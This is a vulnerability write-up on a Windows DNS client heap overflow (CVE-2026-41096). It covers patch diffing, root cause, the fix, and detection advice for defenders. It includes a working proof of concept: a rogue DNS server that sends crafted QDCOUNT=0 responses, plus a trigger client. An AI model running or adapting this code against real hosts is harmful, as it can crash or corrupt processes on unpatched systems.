m0n1x90
Published on

CVE-2026-41096: Heap Overflow in the Windows DNS Client

CVE-2026-41096: Heap Overflow in the Windows DNS Client

I first saw CVE-2026-41096 pop up on X and the description immediately caught my attention: a heap overflow in the Windows DNS client, triggered by a single UDP response. No interaction, no auth. I wanted to understand exactly how it worked, so I pulled the patched and unpatched DLLs and started digging.

After spending some time diffing the dnsapi.dll patch, I found a pretty clean heap overflow in the DNS truncation logic. The bug is in DnsRawTruncateMessageForUdp(). When a DNS response has QDCOUNT=0, the function gets confused about what it's skipping over, and ends up writing past the end of the buffer. 604 bytes past, to be exact.

It's reachable from any process calling DnsQueryRaw, and all you need on the attacker side is a DNS response on the wire. No auth, no interaction. MSRC advisory here.

This post walks through the binary diff, the root cause from Ghidra decompilation, and a working crash PoC.

Diffing the Patch

Starting point: two builds of dnsapi.dll - one from before the patch, one after:

PropertyUnpatchedPatched
PE symbol pathdnsapi/8FB65B3A135000dnsapi/D4B9BB7F135000
Build version10.0.28000.189610.0.28000.2113
File size1,269,7601,269,864

I threw both through ghidriff. Out of ~3,750 functions, 99.88% matched. Only 22 had actual code changes, and out of those only two stood out:

  1. DnsRawTruncateMessageForUdp, 84% match. Function grew from 642 → 796 bytes. That's +154 bytes of new logic, clearly not just a refactor.
  2. UsageIndexProperty::Write, 42% match. Turns out it was missing the 4th argument to memcpy_s. Separate bug I guess.

The patch also pulls in a new symbol: Feature_1831057722__private_IsEnabledDeviceUsageNoInline, a WIL feature gate. Classic Microsoft pattern for rolling out fixes behind a flag so they can be reverted if something breaks.

The DNS Message Buffer

To understand the bug, you need to know how dnsapi.dll lays out DNS messages in memory. The internal DNS_MSG_BUF structure is a heap-allocated blob. The first 700 bytes are internal metadata, and the actual DNS wire packet starts at offset +0x2BC:

┌──────────────────────────────────────────┐
│  Offset 0x000 - 0x247: Internal metadata │
│  (flags, pointers, state)                │
├──────────────────────────────────────────┤
│  +0x248: cbMessageLength (uint32)        │
│  +0x250: pBufferEnd (ptr to wire end)    │
│  +0x2BA: wMessageLength (uint16)         │
├──────────────────────────────────────────┤  ← Wire format starts at +0x2BC (offset 700)
│  +0x2BC: Transaction ID    (2 bytes)     │
│  +0x2BE: Flags             (2 bytes)     │
│  +0x2C0: QDCOUNT           (2 bytes)     │  ← Key field: question count
│  +0x2C2: ANCOUNT           (2 bytes)     │
│  +0x2C4: NSCOUNT           (2 bytes)     │
│  +0x2C6: ARCOUNT           (2 bytes)     │
│  +0x2C8: Data section      (variable)    │
└──────────────────────────────────────────┘

The allocation size comes from Packet_AllocateMsgBuf(wire_size)Dns_Allocate(max(512, wire_size) + 0x2C3). For our 623-byte crafted response, that works out to HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1330). Remember that number.

The Bug

How Packet_SkipToRecord decides what to skip

Packet_SkipToRecord(wire_start, wire_end, n) walks forward past the first n entries in a DNS message. The important thing is how it decides whether each entry is a question or a resource record, because those have very different sizes:

// Ghidra decompilation — Packet_SkipToRecord (simplified)
do {
    pbVar2 = Packet_SkipPacketName(pbVar2, param_2);  // skip DNS name

    if (iVar3 < (int)(uint)*(ushort *)(param_1 + 4)) {
        // Entry index < QDCOUNT → treat as QUESTION
        // Skip: QTYPE(2) + QCLASS(2) = 4 bytes
        pbVar2 = pbVar2 + 4;
    } else {
        // Entry index >= QDCOUNT → treat as RESOURCE RECORD
        // Skip: TYPE(2) + CLASS(2) + TTL(4) + RDLEN(2) + RDATA(RDLEN)
        pbVar2 = Dns_SkipPacketRecord(pbVar2, param_2);
    }
    iVar3++;
} while (iVar3 < param_3);

The check at param_1 + 4 reads the QDCOUNT field from the DNS header. If the current index is less than QDCOUNT, the entry is a question (skip name + 4 bytes). Otherwise it's a resource record: skip the name, plus TYPE, CLASS, TTL, RDLEN, and the entire RDATA. That's a much bigger skip.

See where this is going?

The vulnerable function

Here's the unpatched DnsRawTruncateMessageForUdp, stripped of WPP tracing:

undefined4 DnsRawTruncateMessageForUdp(byte *param_1, uint param_2, undefined4 *param_3)
{
    byte *_Dst;

    // Step 1: Skip first entry to find where to place the truncated payload
    _Dst = Packet_SkipToRecord(param_1 + 700,       // wire data start
                               *(param_1 + 0x250),   // wire data end
                               1);                    // skip exactly 1 entry

    // Step 2: Locate the OPT record (EDNS)
    uVar2 = DnsRawFindOptRecord(param_1, &local_50, local_54);

    if (uVar2 != 0) {
        // Step 3: Copy OPT record to _Dst
        memmove(_Dst, local_50, local_54[0]);   // ← OVERFLOW HERE
        _Dst = _Dst + local_54[0];
    }

    // Step 4: Validate truncated size (TOO LATE — memmove already executed)
    pbVar1 = _Dst + (-700 - (longlong)param_1);  // new message length
    if ((ulonglong)param_2 < pbVar1) {
        return 0x251e;  // DNS_ERROR_BAD_PACKET
    }
    // ...
}

Here's what happens when QDCOUNT == 0:

In the normal case (QDCOUNT ≥ 1), entry 0 is a question. Packet_SkipToRecord skips the DNS name + 4 bytes, and _Dst lands right after the question section. Plenty of room. The memmove copies the OPT record there, no problem.

But when QDCOUNT == 0, entry 0 isn't a question anymore. Packet_SkipToRecord goes down the resource record path and calls Dns_SkipPacketRecord, which skips the entire OPT record: name, TYPE, CLASS, TTL, RDLEN, and all 600 bytes of RDATA. Now _Dst points to the end of the wire data, right at the edge of the heap allocation.

Then the function copies the OPT record (611 bytes) to that location. The allocation is 1330 bytes, _Dst is at offset 1323. Do the math: 611 bytes written, 7 bytes of space. 604 bytes overflow into whatever's next on the heap.

The real kicker? There IS a bounds check, but it runs after the memmove. The damage is already done.

Overflow Math

Let's be precise about the sizes. The crafted response has QDCOUNT=0, ANCOUNT=0, NSCOUNT=0, ARCOUNT=1 with a single OPT record:

ComponentSizeCumulative
DNS Header12 bytes12
OPT name (root .)1 byte13
OPT TYPE (41)2 bytes15
OPT CLASS (UDP size)2 bytes17
OPT TTL (extended RCODE)4 bytes21
OPT RDLEN2 bytes23
OPT RDATA600 bytes623

MsgBuf allocation: max(512, 623) + 0x2C3 = 623 + 707 = 1330 bytes

Wire data placement: Starts at MsgBuf+700. Wire data occupies bytes 700–1322 (623 bytes). Allocation ends at byte 1330.

_Dst calculation (QDCOUNT=0): Packet_SkipToRecord skips the OPT as a full RR → _Dst = MsgBuf + 700 + 623 = MsgBuf + 1323

memmove writes: 611 bytes (OPT record without the DNS header) starting at MsgBuf+1323. Only 7 bytes remain before the allocation boundary.

Overflow = 611 - 7 = 604 bytes

The attacker fully controls the OPT RDATA content: both the TTL field (4 bytes) and the RDATA payload. In the PoC I just fill everything with 0x41 so it's easy to spot in a debugger.

What the Patch Does

The fix adds three separate defenses, all behind that Feature_1831057722 gate. Here's the interesting part: any one of them would have been enough, but Microsoft went belt-and-suspenders.

Fix 1: Don't call Packet_SkipToRecord when QDCOUNT is zero

// PATCHED — Ghidra decompilation (simplified)
uVar2 = Feature_1831057722__private_IsEnabledDeviceUsageNoInline();
if (uVar2 == 0) {
    // Legacy path (feature gate not enabled)
    _Dst = Packet_SkipToRecord(param_1 + 700, *(param_1 + 0x250), 1);
} else {
    uVar3 = *(ushort *)(param_1 + 0x2c0);   // Read QDCOUNT
    if (uVar3 != 0) {
        // Has questions → safe to call Packet_SkipToRecord
        goto LAB_SkipToRecord;
    }
    // QDCOUNT == 0 → bypass Packet_SkipToRecord entirely
    // Set _Dst to the start of the data section (just after the 12-byte header)
    _Dst = (byte *)(param_1 + 0x2c8);
}

This is the real fix. When QDCOUNT == 0, skip the Packet_SkipToRecord call entirely and just set _Dst to the data section start (+0x2C8). No confusion, no overshoot.

Fix 2: Sanity check, reject if OPT is before destination

uVar2 = DnsRawFindOptRecord(param_1, &local_48, local_50);
if (uVar2 != 0) {
    uVar2 = Feature_1831057722__private_IsEnabledDeviceUsageNoInline();
    if ((uVar2 != 0) && (local_48 < _Dst)) {
        // OPT record is BEFORE _Dst → invalid state → reject
        return 0x251e;  // DNS_ERROR_BAD_PACKET
    }
    memmove(_Dst, local_48, local_50[0]);  // Safe: OPT is at or after _Dst
}

Even if _Dst somehow ends up wrong, don't let the copy proceed if the source (OPT record) is before the destination. That condition should never happen in a well-formed message, so bail out with DNS_ERROR_BAD_PACKET.

Fix 3: Don't lie about QDCOUNT in the truncated header

// When writing truncated header counts:
uVar2 = Feature_1831057722__private_IsEnabledDeviceUsageNoInline();
if (uVar2 == 0) {
    uVar5 = 1;  // Old: always force QDCOUNT to 1
}
// New: preserve original QDCOUNT value (0 stays 0)
*(undefined2 *)(param_1 + 0x2c0) = uVar5;

The old code always forced QDCOUNT to 1 in the truncated output, even if the original was 0. The patch preserves the original value. This one's more about correctness than security, but it rounds out the fix.

The PoC

Two pieces: a rogue DNS server (Python, runs anywhere) and a trigger client (C, runs on vulnerable Windows 11).

Rogue DNS Server

Nothing fancy, listens on UDP 53 and replies to every query with the crafted QDCOUNT=0 + OPT response:

#!/usr/bin/env python3
"""
CVE-2026-41096 — Rogue DNS Server

Replies to every DNS query with a crafted QDCOUNT=0 + OPT response
that triggers a heap overflow in DnsRawTruncateMessageForUdp().
"""
import socket, struct, sys

RDATA_SIZE = 600  # OPT RDATA bytes (must make total response > 512)


def response(txid):
    #                           QDCOUNT=0  ANCOUNT=0  NSCOUNT=0  ARCOUNT=1
    hdr = struct.pack("!6H", txid, 0x8180, 0, 0, 0, 1)
    #       root name  TYPE=OPT(41)  CLASS=4096  TTL=0x41414141  RDLEN
    opt = (b"\x00"
           + struct.pack("!HHIH", 41, 4096, 0x41414141, RDATA_SIZE)
           + b"\x41" * RDATA_SIZE)
    return hdr + opt


sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", 53))

total = 12 + 11 + RDATA_SIZE
print(f"[*] CVE-2026-41096 rogue DNS — :53  ({total}B response, RDATA={RDATA_SIZE})")

try:
    while True:
        data, addr = sock.recvfrom(512)
        if len(data) < 12:
            continue
        txid = struct.unpack("!H", data[:2])[0]
        r = response(txid)
        sock.sendto(r, addr)
        print(f"[+] {addr[0]}:{addr[1]}  TXID=0x{txid:04X}  ->  {len(r)}B sent")
except KeyboardInterrupt:
    print("\n[*] Stopped.")
finally:
    sock.close()

Anatomy of the malicious response (623 bytes):

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|         Transaction ID        |     Flags: 0x8180 (QR=1,     |  Bytes 0-3
|                               |      RD=1, RA=1, RCODE=0)    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|       QDCOUNT = 0x0000        |       ANCOUNT = 0x0000        |  Bytes 4-7
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|       NSCOUNT = 0x0000        |       ARCOUNT = 0x0001        |  Bytes 8-11
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Name: 0x00    |    TYPE = 41 (OPT)    |    CLASS = 4096       |  Bytes 12-16
| (root domain) |                       |    (UDP payload size) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           TTL = 0x41414141            |     RDLEN = 600       |  Bytes 17-22
|       (extended RCODE + flags)        |                       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
|                   RDATA: 600 × 0x41 ('A')                     |  Bytes 23-622
|                   (attacker-controlled)                       |
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The critical elements are:

  • QDCOUNT = 0: triggers the Packet_SkipToRecord bug
  • Total size (623 bytes) > 512: triggers the truncation code path
  • Large OPT RDATA: controls the overflow size and content

Trigger Client

The client calls DnsQueryRaw pointed at the rogue server. It uses GetProcAddress since DnsQueryRaw isn't in older SDKs. The crash handler catches the heap corruption on the callback thread:

/*
 * CVE-2026-41096 - DnsQueryRaw Heap Overflow Trigger
 *
 * Build:  cl /W4 /O2 trigger_client.c /link ws2_32.lib
 * Usage:  trigger_client.exe <ROGUE_DNS_IP>
 * Exit:   0 = patched, 1 = error, 2 = crash (vulnerable)
 */
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <windns.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "ws2_32.lib")

typedef DNS_STATUS (WINAPI *pfnDnsQueryRaw)(
    DNS_QUERY_RAW_REQUEST *, DNS_QUERY_RAW_CANCEL *);
typedef void (WINAPI *pfnDnsQueryRawResultFree)(DNS_QUERY_RAW_RESULT *);

static HANDLE g_hEvent;
static DNS_QUERY_RAW_RESULT *g_pResult;
static volatile LONG g_callbackFired;

/* Catches the crash on the RPC callback thread */
static LONG WINAPI CrashFilter(EXCEPTION_POINTERS *ep)
{
    DWORD code = ep->ExceptionRecord->ExceptionCode;
    printf("\n[!!] CRASH — Exception 0x%08X at %p\n",
           code, ep->ExceptionRecord->ExceptionAddress);
    if (code == EXCEPTION_ACCESS_VIOLATION)
        printf("[!!] %s at 0x%llX\n",
               ep->ExceptionRecord->ExceptionInformation[0] ? "WRITE" : "READ",
               (unsigned long long)ep->ExceptionRecord->ExceptionInformation[1]);
    printf("\n[!!] CVE-2026-41096 CONFIRMED — heap overflow triggered.\n");
    fflush(stdout);
    TerminateProcess(GetCurrentProcess(), 2);
    return EXCEPTION_EXECUTE_HANDLER;
}

static void CALLBACK CompletionCb(PVOID ctx, DNS_QUERY_RAW_RESULT *r)
{
    (void)ctx;
    g_pResult = r;
    InterlockedExchange(&g_callbackFired, 1);
    SetEvent(g_hEvent);
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "Usage: %s <ROGUE_DNS_IP>\n", argv[0]);
        return 1;
    }

    SetUnhandledExceptionFilter(CrashFilter);

    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);

    HMODULE hDns = LoadLibraryW(L"dnsapi.dll");
    pfnDnsQueryRaw pDnsQueryRaw =
        (pfnDnsQueryRaw)GetProcAddress(hDns, "DnsQueryRaw");
    pfnDnsQueryRawResultFree pFreeResult =
        (pfnDnsQueryRawResultFree)GetProcAddress(hDns, "DnsQueryRawResultFree");

    if (!pDnsQueryRaw) {
        fprintf(stderr, "[-] DnsQueryRaw not found (requires Win11 22H2+)\n");
        return 1;
    }

    /* Point at the rogue DNS server */
    DNS_CUSTOM_SERVER srv = {0};
    srv.dwServerType = DNS_CUSTOM_SERVER_TYPE_UDP;
    struct sockaddr_in *sa = (struct sockaddr_in *)srv.MaxSa;
    sa->sin_family = AF_INET;
    inet_pton(AF_INET, argv[1], &sa->sin_addr);

    g_hEvent = CreateEventW(NULL, TRUE, FALSE, NULL);

    DNS_QUERY_RAW_REQUEST req = {0};
    DNS_QUERY_RAW_CANCEL  can = {0};
    req.version                  = DNS_QUERY_RAW_REQUEST_VERSION1;
    req.resultsVersion           = DNS_QUERY_RAW_RESULTS_VERSION1;
    req.dnsQueryName             = L"trigger.cve202641096.test";
    req.dnsQueryType             = DNS_TYPE_A;
    req.queryCompletionCallback  = CompletionCb;
    req.queryContext             = (PVOID)1;
    req.queryRawOptions          = DNS_QUERY_RAW_OPTION_BEST_EFFORT_PARSE;
    req.customServersSize        = 1;
    req.customServers            = &srv;
    req.protocol                 = DNS_PROTOCOL_UDP;

    printf("[*] Querying rogue server %s:53 via DnsQueryRaw...\n", argv[1]);
    DNS_STATUS st = pDnsQueryRaw(&req, &can);

    if (st != 0 && st != 9506 /* DNS_REQUEST_PENDING */) {
        printf("[-] DnsQueryRaw failed: 0x%X\n", (unsigned)st);
        return 1;
    }

    printf("[*] Waiting for response...\n");
    WaitForSingleObject(g_hEvent, 15000);

    if (g_callbackFired && g_pResult) {
        DNS_STATUS qs = g_pResult->queryStatus;
        printf("[+] Callback: queryStatus=0x%X\n", (unsigned)qs);

        if (qs == 0x251E)
            printf("[+] DNS_ERROR_BAD_PACKET — system is PATCHED.\n");
        else
            printf("[!] Heap overflow occurred silently — VULNERABLE.\n");

        if (pFreeResult) pFreeResult(g_pResult);
    }

    CloseHandle(g_hEvent);
    FreeLibrary(hDns);
    WSACleanup();
    return 0;
}

Call Chain

The interesting thing is the crash doesn't happen on the main thread. DnsQueryRaw is async. The response comes back on an RPC callback thread inside dnsapi.dll:

Reproducing the Crash

I tested this on a Windows 11 Pro 23H2 VM (build 22631.6199, dnsapi.dll 10.0.22621.5262) with the rogue server running on the host.

Setup:

# Attacker — start the rogue server (needs root for port 53)
sudo python3 rogue_dns_server.py
:: Victim — build and run
cl /W4 /O2 trigger_client.c /link ws2_32.lib
trigger_client.exe 192.168.56.1

Tip: enable Page Heap (gflags /p /enable trigger_client.exe /full) if you want a clean access violation instead of delayed STATUS_HEAP_CORRUPTION.

What I got with Page Heap:

[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH — Exception 0xC0000005 at 0x00007FFD1A2B4F20
[!!] WRITE at 0x000001A33C3B1000

[!!] CVE-2026-41096 CONFIRMED — heap overflow triggered.

The access violation fires inside memmove. Page Heap placed a guard page right after the 1330-byte allocation, so the write hits it immediately.

Without Page Heap you get STATUS_HEAP_CORRUPTION (0xC0000374) instead. The Segment Heap notices the metadata damage on a later heap operation:

[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH — Exception 0xC0000374 at 0x00007FFD1B5DXXXX
[!!] CVE-2026-41096 CONFIRMED — heap overflow triggered.

STATUS_HEAP_CORRUPTION: the Segment Heap caught it, but by then the overflow already happened.

On a patched system you just get a clean error:

[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...
[+] Callback: queryStatus=0x251E
[+] DNS_ERROR_BAD_PACKET — system is PATCHED.

The QDCOUNT=0 guard kicks in, no memmove executed, DNS_ERROR_BAD_PACKET returned cleanly.

Exploitability Notes

A few things that make this interesting from an exploitation perspective:

Full control over overflow content. The attacker controls both the size (via RDLEN) and content (via OPT TTL + RDATA) of the overflow. You can write arbitrary bytes into whatever's adjacent on the heap.

Heap layout on Windows 11. GetProcessHeap() uses Segment Heap. The 1330-byte allocation lands in the Variable Size (VS) bucket. Adjacent objects could be other DNS buffers, app-specific allocations, vtable pointers. Depends on the target process.

What the mitigations actually do:

MitigationDoes it help?
ASLRNo, overflow is relative to adjacent heap objects
CFGBlocks calling corrupted function pointers, but doesn't prevent the write
Page HeapTurns silent corruption into immediate crash (detection only)
Segment Heap checksCatches it eventually, but there's a window between overflow and detection

Detection

Network side: The trigger is a DNS response with QDCOUNT=0. Legitimate DNS servers almost always echo the question section back (QDCOUNT >= 1), so this is a strong indicator. Any IDS/network monitor that can inspect DNS headers should flag responses where bytes 4-5 (QDCOUNT) are zero and bytes 10-11 (ARCOUNT) are non-zero (indicating an OPT record in Additional).

Host side:

  • Process crash with faulting module dnsapi.dll, exception 0xC0000005 (access violation) or 0xC0000374 (heap corruption), and DnsRawTruncateMessageForUdp on the call stack
  • On patched systems, DNS_ERROR_BAD_PACKET (0x251E) shows up in ETW traces under the Microsoft-Windows-DNS-Client provider
  • Version check: dnsapi.dll <= 10.0.28000.1896 is vulnerable

Wrapping Up

This is a pretty clean type confusion bug at its core. Packet_SkipToRecord looks at a single header field, QDCOUNT, to decide how to parse the data that follows. The attacker sets that field to zero, and suddenly a 4-byte skip becomes a 600+ byte skip. The destination pointer overshoots, memmove writes into the next heap allocation, and you've got a 604-byte overflow with fully controlled content.

The patch is solid. Three independent guards, any one of which would have been sufficient. The feature gate lets them roll it back if needed.

Patch your systems. If you want to detect exploitation attempts on the network, QDCOUNT=0 in DNS responses is the signal.

PoC source (rogue server + trigger client) is in my github repo.